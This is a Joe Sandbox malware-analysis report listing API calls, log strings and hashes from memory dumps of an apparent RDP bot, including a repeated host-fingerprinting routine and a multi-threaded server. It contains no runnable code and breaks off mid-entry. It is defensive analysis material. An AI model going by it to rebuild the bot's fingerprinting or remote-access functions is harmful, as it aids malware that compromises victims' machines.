Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: _errno$fclosefflushfopenfseekfwrite
String ID: (((*buf) == NULL) || ((*buf_sz) > 0))$(buf_sz != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> fopen failed(path=%s,errno=%d)$[E] (%s) -> fread failed(path=%s,errno=%d)$[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld)$[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d)$[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d)$[E] (%s) -> ftell failed(path=%s,errno=%d)$[I] (%s) -> Done(path=%s,buf_sz=%llu)$fs_file_read$mem_alloc
API String ID: 2897271634-4120527733
Opcode ID: 06552b6d665657d530df30bd6e78b206d8aa5c71a17eae6289350a2be74dd1e0
Instruction ID: 3a33c9ba258e322e01cfab41a9cf3708d20a058addb9a5af73449511881f699f
Opcode Fuzzy Hash: 06552b6d665657d530df30bd6e78b206d8aa5c71a17eae6289350a2be74dd1e0
Instruction Fuzzy Hash: 76D15671A09A82C1EB10FF55E850BBCA661AF557A5FC44133D90E473A1EEBDE586C320

Function 00007FFE126E3AA7 Relevance: 66.8, APIs: 10, Strings: 28, Instructions: 327
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE126E3AC2
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE126E3AEF
CreateThread.KERNEL32 ref: 00007FFE126E3B3B
CreateThread.KERNEL32 ref: 00007FFE126E3B9B
CreateThread.KERNEL32 ref: 00007FFE126E3BFB
GetLastError.KERNEL32 ref: 00007FFE126E3C52
GetLastError.KERNEL32 ref: 00007FFE126E3D6E
GetLastError.KERNEL32 ref: 00007FFE126E3E46

Part of subcall function 00007FFE126E2072: fwrite.MSVCRT ref: 00007FFE126E211E
Part of subcall function 00007FFE126E2072: fflush.MSVCRT ref: 00007FFE126E212A

GetLastError.KERNEL32 ref: 00007FFE126E3F4E

Part of subcall function 00007FFE126E2072: EnterCriticalSection.KERNEL32 ref: 00007FFE126E2143
Part of subcall function 00007FFE126E2072: LeaveCriticalSection.KERNEL32 ref: 00007FFE126E216B
Part of subcall function 00007FFE126E2072: CopyFileA.KERNEL32 ref: 00007FFE126E21C8

GetLastError.KERNEL32 ref: 00007FFE126E404C

Strings

P, xrefs: 00007FFE126E3EBE
P, xrefs: 00007FFE126E3DF5
, xrefs: 00007FFE126E3F6C
[I] (%s) -> CreateThread(%s) done, xrefs: 00007FFE126E3B5F, 00007FFE126E3BBF, 00007FFE126E3C1F
Done, xrefs: 00007FFE126E3C33
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_queue) failed(gle=%lu), xrefs: 00007FFE126E3C64
~, xrefs: 00007FFE126E3CD0
P, xrefs: 00007FFE126E4097
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_clients) failed(gle=%lu), xrefs: 00007FFE126E3D80
routine_gc, xrefs: 00007FFE126E3B51
routine_tx, xrefs: 00007FFE126E3C11
~, xrefs: 00007FFE126E3FC1
~, xrefs: 00007FFE126E3DEC
routine_accept, xrefs: 00007FFE126E3BB1
[I] (%s) -> %s, xrefs: 00007FFE126E3C41
P, xrefs: 00007FFE126E3FC6
[E] (%s) -> CreateThread(routine_accept) failed(gle=%lu), xrefs: 00007FFE126E3F60
[E] (%s) -> CreateThread(routine_tx) failed(gle=%lu), xrefs: 00007FFE126E405E
server_init, xrefs: 00007FFE126E3B58, 00007FFE126E3BB8, 00007FFE126E3C18, 00007FFE126E3C3A, 00007FFE126E3C5D, 00007FFE126E3D79, 00007FFE126E3E51, 00007FFE126E3F59, 00007FFE126E4057, 00007FFE126E414A
~, xrefs: 00007FFE126E4092
P, xrefs: 00007FFE126E3CD5
, xrefs: 00007FFE126E3D8C
~, xrefs: 00007FFE126E3EB9
, xrefs: 00007FFE126E3C70
, xrefs: 00007FFE126E406A
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE126E4151
, xrefs: 00007FFE126E3E64
[E] (%s) -> CreateThread(routine_gc) failed(gle=%lu), xrefs: 00007FFE126E3E58

Memory Dump Source

Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true

Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd

Similarity

API ID: ErrorLast$CriticalSection$CreateThread$CountInitializeSpin$CopyEnterFileLeavefflushfwrite
String ID: $ $ $ $ $Done$P$P$P$P$P$[E] (%s) -> CreateThread(routine_accept) failed(gle=%lu)$[E] (%s) -> CreateThread(routine_gc) failed(gle=%lu)$[E] (%s) -> CreateThread(routine_tx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_clients) failed(gle=%lu)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_queue) failed(gle=%lu)$[I] (%s) -> %s$[I] (%s) -> CreateThread(%s) done$routine_accept$routine_gc$routine_tx$server_init$~$~$~$~$~
API String ID: 3214881788-719614687
Opcode ID: f7911d3e117f0e2a4205b477b6c60c068354a7cbdf9ae8e7f48fa1ee92ee012b
Instruction ID: 233f696a64fb2a3834489794e0f31107f95b9ec79340b12305491919c1454780
Opcode Fuzzy Hash: f7911d3e117f0e2a4205b477b6c60c068354a7cbdf9ae8e7f48fa1ee92ee012b
Instruction Fuzzy Hash: 43F1DA20E0CF4382FF60D717AC943B92291AF25379F2403B6C56E462F5DEEEA9958345

Function 00007FFE126E482C Relevance: 58.0, APIs: 11, Strings: 22, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFE126E5154: LoadLibraryA.KERNEL32 ref: 00007FFE126E5162

Part of subcall function 00007FFE126E50D3: GetProcAddress.KERNEL32 ref: 00007FFE126E50F3

FreeLibrary.KERNEL32 ref: 00007FFE126E48BF
GetNativeSystemInfo.KERNEL32 ref: 00007FFE126E490B
GetWindowsDirectoryA.KERNEL32 ref: 00007FFE126E4924
GetLastError.KERNEL32 ref: 00007FFE126E4932

Strings

, xrefs: 00007FFE126E4B03
%, xrefs: 00007FFE126E4A39
RtlGetVersion, xrefs: 00007FFE126E484C
sys_init, xrefs: 00007FFE126E489D, 00007FFE126E48D2, 00007FFE126E493D, 00007FFE126E4A1E, 00007FFE126E4AF0, 00007FFE126E4B2E, 00007FFE126E4BE1, 00007FFE126E4C77, 00007FFE126E4D50
:, xrefs: 00007FFE126E4A8B
[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu), xrefs: 00007FFE126E4AF7
[E] (%s) -> RtlGetVersion failed(res=%08lx), xrefs: 00007FFE126E48A4
[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s), xrefs: 00007FFE126E4A25
[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu), xrefs: 00007FFE126E4944
C:\Windows, xrefs: 00007FFE126E491D, 00007FFE126E4A10
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE126E48D9
P, xrefs: 00007FFE126E4B62
\, xrefs: 00007FFE126E4A90
~, xrefs: 00007FFE126E4B59
[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d), xrefs: 00007FFE126E4D57
SOFTWARE\Microsoft\Cryptography, xrefs: 00007FFE126E4A5A
ntdll.dll, xrefs: 00007FFE126E4834
MachineGuid, xrefs: 00007FFE126E4A53
[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx), xrefs: 00007FFE126E4BE8
[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s), xrefs: 00007FFE126E4B35
[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d), xrefs: 00007FFE126E4C7E
9e146be9-c76a-4720-bcdb-53011b87bd06, xrefs: 00007FFE126E4A4C, 00007FFE126E4B20

Memory Dump Source

Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true

Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd

Similarity

API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
API String ID: 3828489143-883582248
Opcode ID: 37bdd8bba23396995cb43fde43ceaba587d72f5a41f2d6fa8fc17c29e9146edb
Instruction ID: 44f6f32b967d26fcfc42b914b526bc0de99fcc6800708287b936cd84f1398a58
Opcode Fuzzy Hash: 37bdd8bba23396995cb43fde43ceaba587d72f5a41f2d6fa8fc17c29e9146edb
Instruction Fuzzy Hash: C4D11B21E0CE9285FB20DB67ACA03B92250EB55BB4F1502F2C95D176F4DEADE844C785

Function 00007FFE11BDC25C Relevance: 56.3, APIs: 10, Strings: 22, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFE11BDBC64: LoadLibraryA.KERNEL32 ref: 00007FFE11BDBC72

Part of subcall function 00007FFE11BDBBE3: GetProcAddress.KERNEL32 ref: 00007FFE11BDBC03

FreeLibrary.KERNEL32 ref: 00007FFE11BDC2EF
GetNativeSystemInfo.KERNEL32 ref: 00007FFE11BDC33B
GetWindowsDirectoryA.KERNEL32 ref: 00007FFE11BDC354
GetLastError.KERNEL32 ref: 00007FFE11BDC362

Strings

[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s), xrefs: 00007FFE11BDC455
MachineGuid, xrefs: 00007FFE11BDC483
RtlGetVersion, xrefs: 00007FFE11BDC27C
[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu), xrefs: 00007FFE11BDC527
[E] (%s) -> RtlGetVersion failed(res=%08lx), xrefs: 00007FFE11BDC2D4
[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d), xrefs: 00007FFE11BDC6AE
sys_init, xrefs: 00007FFE11BDC2CD, 00007FFE11BDC302, 00007FFE11BDC36D, 00007FFE11BDC44E, 00007FFE11BDC520, 00007FFE11BDC55E, 00007FFE11BDC611, 00007FFE11BDC6A7, 00007FFE11BDC780
~, xrefs: 00007FFE11BDC589
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE11BDC309
[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu), xrefs: 00007FFE11BDC374
ntdll.dll, xrefs: 00007FFE11BDC264
P, xrefs: 00007FFE11BDC592
:, xrefs: 00007FFE11BDC4BB
, xrefs: 00007FFE11BDC533
[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx), xrefs: 00007FFE11BDC618
[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d), xrefs: 00007FFE11BDC787
%, xrefs: 00007FFE11BDC469
C:\Windows, xrefs: 00007FFE11BDC34D, 00007FFE11BDC440
9e146be9-c76a-4720-bcdb-53011b87bd06, xrefs: 00007FFE11BDC47C, 00007FFE11BDC550
SOFTWARE\Microsoft\Cryptography, xrefs: 00007FFE11BDC48A
[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s), xrefs: 00007FFE11BDC565
\, xrefs: 00007FFE11BDC4C0

Memory Dump Source

Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd

Similarity

API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
API String ID: 3828489143-883582248
Opcode ID: 8bef46f6451bce531e2b0b4ae084a213c315c766dd6f265defd2aab1fb297d2e
Instruction ID: 7cec1e2f2a6b03fc55f9671f3564de1bcb4ebb3e9292efb69413b505227be689
Opcode Fuzzy Hash: 8bef46f6451bce531e2b0b4ae084a213c315c766dd6f265defd2aab1fb297d2e
Instruction Fuzzy Hash: 69D18C61E0DE87C1FF389F57E840BF96698AF04778F1560BAD94E132B0DE2DA9448781

Function 00007FFE1A4F348C Relevance: 56.3, APIs: 10, Strings: 22, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFE1A4F3DB4: LoadLibraryA.KERNEL32 ref: 00007FFE1A4F3DC2

Part of subcall function 00007FFE1A4F3D33: GetProcAddress.KERNEL32 ref: 00007FFE1A4F3D53

FreeLibrary.KERNEL32 ref: 00007FFE1A4F351F
GetNativeSystemInfo.KERNEL32 ref: 00007FFE1A4F356B
GetWindowsDirectoryA.KERNEL32 ref: 00007FFE1A4F3584
GetLastError.KERNEL32 ref: 00007FFE1A4F3592

Strings

ntdll.dll, xrefs: 00007FFE1A4F3494
[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu), xrefs: 00007FFE1A4F35A4
MachineGuid, xrefs: 00007FFE1A4F36B3
[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx), xrefs: 00007FFE1A4F3848
, xrefs: 00007FFE1A4F3763
\, xrefs: 00007FFE1A4F36F0
[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s), xrefs: 00007FFE1A4F3685
C:\Windows, xrefs: 00007FFE1A4F357D, 00007FFE1A4F3670
P, xrefs: 00007FFE1A4F37C2
SOFTWARE\Microsoft\Cryptography, xrefs: 00007FFE1A4F36BA
~, xrefs: 00007FFE1A4F37B9
9e146be9-c76a-4720-bcdb-53011b87bd06, xrefs: 00007FFE1A4F36AC, 00007FFE1A4F3780
[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d), xrefs: 00007FFE1A4F39B7
[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s), xrefs: 00007FFE1A4F3795
sys_init, xrefs: 00007FFE1A4F34FD, 00007FFE1A4F3532, 00007FFE1A4F359D, 00007FFE1A4F367E, 00007FFE1A4F3750, 00007FFE1A4F378E, 00007FFE1A4F3841, 00007FFE1A4F38D7, 00007FFE1A4F39B0
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE1A4F3539
:, xrefs: 00007FFE1A4F36EB
[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d), xrefs: 00007FFE1A4F38DE
RtlGetVersion, xrefs: 00007FFE1A4F34AC
[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu), xrefs: 00007FFE1A4F3757
[E] (%s) -> RtlGetVersion failed(res=%08lx), xrefs: 00007FFE1A4F3504
%, xrefs: 00007FFE1A4F3699

Memory Dump Source

Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true

Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd

Similarity

API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
API String ID: 3828489143-883582248
Opcode ID: 6fc8e5aef3c0adedc2f43b3f166f384598c9bf3ae0fb0c236191496213b27637
Instruction ID: 8cac0dbbb7d9ca5e7a9ed5737f94ef1452d014a226dd7347c61f2d2c1149b926
Opcode Fuzzy Hash: 6fc8e5aef3c0adedc2f43b3f166f384598c9bf3ae0fb0c236191496213b27637
Instruction Fuzzy Hash: FDD13A61F0CE5381FA208B1BE5843BD2290AB42FB6F1961F3D95E476B0DE2DF8648341

Function 00007FFE1A526E0C Relevance: 56.3, APIs: 10, Strings: 22, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFE1A527734: LoadLibraryA.KERNEL32 ref: 00007FFE1A527742

Part of subcall function 00007FFE1A5276B3: GetProcAddress.KERNEL32 ref: 00007FFE1A5276D3

FreeLibrary.KERNEL32 ref: 00007FFE1A526E9F
GetNativeSystemInfo.KERNEL32 ref: 00007FFE1A526EEB
GetWindowsDirectoryA.KERNEL32 ref: 00007FFE1A526F04
GetLastError.KERNEL32 ref: 00007FFE1A526F12

Strings

[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s), xrefs: 00007FFE1A527115
C:\Windows, xrefs: 00007FFE1A526EFD, 00007FFE1A526FF0
MachineGuid, xrefs: 00007FFE1A527033
~, xrefs: 00007FFE1A527139
[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s), xrefs: 00007FFE1A527005
[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu), xrefs: 00007FFE1A5270D7
SOFTWARE\Microsoft\Cryptography, xrefs: 00007FFE1A52703A
ntdll.dll, xrefs: 00007FFE1A526E14
%, xrefs: 00007FFE1A527019
[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d), xrefs: 00007FFE1A52725E
[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu), xrefs: 00007FFE1A526F24
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE1A526EB9
[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d), xrefs: 00007FFE1A527337
\, xrefs: 00007FFE1A527070
9e146be9-c76a-4720-bcdb-53011b87bd06, xrefs: 00007FFE1A52702C, 00007FFE1A527100
, xrefs: 00007FFE1A5270E3
sys_init, xrefs: 00007FFE1A526E7D, 00007FFE1A526EB2, 00007FFE1A526F1D, 00007FFE1A526FFE, 00007FFE1A5270D0, 00007FFE1A52710E, 00007FFE1A5271C1, 00007FFE1A527257, 00007FFE1A527330
[E] (%s) -> RtlGetVersion failed(res=%08lx), xrefs: 00007FFE1A526E84
:, xrefs: 00007FFE1A52706B
RtlGetVersion, xrefs: 00007FFE1A526E2C
[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx), xrefs: 00007FFE1A5271C8
P, xrefs: 00007FFE1A527142

Memory Dump Source

Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true

Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd

Similarity

API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
API String ID: 3828489143-883582248
Opcode ID: 2ef9b5f18b18199533d016a030eb303b2a9090cb8709f737a6286bf02976b20c
Instruction ID: 4f339d2b67817db1ef3c2e642c11d81d5011f0ef0e8ebbee23fd3e3569ff0091
Opcode Fuzzy Hash: 2ef9b5f18b18199533d016a030eb303b2a9090cb8709f737a6286bf02976b20c
Instruction Fuzzy Hash: 0CD11722F1CE52C1FB609797E4403B926A2AF92F74F1540F7E94E17AB4EF2DA8448351

Function 00007FFE1150210C Relevance: 56.3, APIs: 10, Strings: 22, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFE11502A34: LoadLibraryA.KERNEL32 ref: 00007FFE11502A42

Part of subcall function 00007FFE115029B3: GetProcAddress.KERNEL32 ref: 00007FFE115029D3

FreeLibrary.KERNEL32 ref: 00007FFE1150219F
GetNativeSystemInfo.KERNEL32 ref: 00007FFE115021EB
GetWindowsDirectoryA.KERNEL32 ref: 00007FFE11502204
GetLastError.KERNEL32 ref: 00007FFE11502212

Strings

SOFTWARE\Microsoft\Cryptography, xrefs: 00007FFE1150233A
, xrefs: 00007FFE115023E3
[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s), xrefs: 00007FFE11502305
[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu), xrefs: 00007FFE11502224
sys_init, xrefs: 00007FFE1150217D, 00007FFE115021B2, 00007FFE1150221D, 00007FFE115022FE, 00007FFE115023D0, 00007FFE1150240E, 00007FFE115024C1, 00007FFE11502557, 00007FFE11502630
~, xrefs: 00007FFE11502439
RtlGetVersion, xrefs: 00007FFE1150212C
\, xrefs: 00007FFE11502370
[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d), xrefs: 00007FFE11502637
[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu), xrefs: 00007FFE115023D7
P, xrefs: 00007FFE11502442
[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s), xrefs: 00007FFE11502415
%, xrefs: 00007FFE11502319
ntdll.dll, xrefs: 00007FFE11502114
:, xrefs: 00007FFE1150236B
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE115021B9
[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d), xrefs: 00007FFE1150255E
[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx), xrefs: 00007FFE115024C8
[E] (%s) -> RtlGetVersion failed(res=%08lx), xrefs: 00007FFE11502184
C:\Windows, xrefs: 00007FFE115021FD, 00007FFE115022F0
9e146be9-c76a-4720-bcdb-53011b87bd06, xrefs: 00007FFE1150232C, 00007FFE11502400
MachineGuid, xrefs: 00007FFE11502333

Memory Dump Source

Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd

Similarity

API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
API String ID: 3828489143-883582248
Opcode ID: ab4e7dae9261fa064c85ad98148a0635a1087c5140ac61d5b376cedad794d68b
Instruction ID: cc6af2172127867351dc8b17cc8de20e2af9acb56f8a63d614f3fee1591dcf1a
Opcode Fuzzy Hash: ab4e7dae9261fa064c85ad98148a0635a1087c5140ac61d5b376cedad794d68b
Instruction Fuzzy Hash: FED1AB26E0CE5381FB219B97E8403BC26A9AF457F4F5541FACA4E176B0DF2DE8858341

Function 00007FFE11EC44CC Relevance: 56.3, APIs: 10, Strings: 22, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

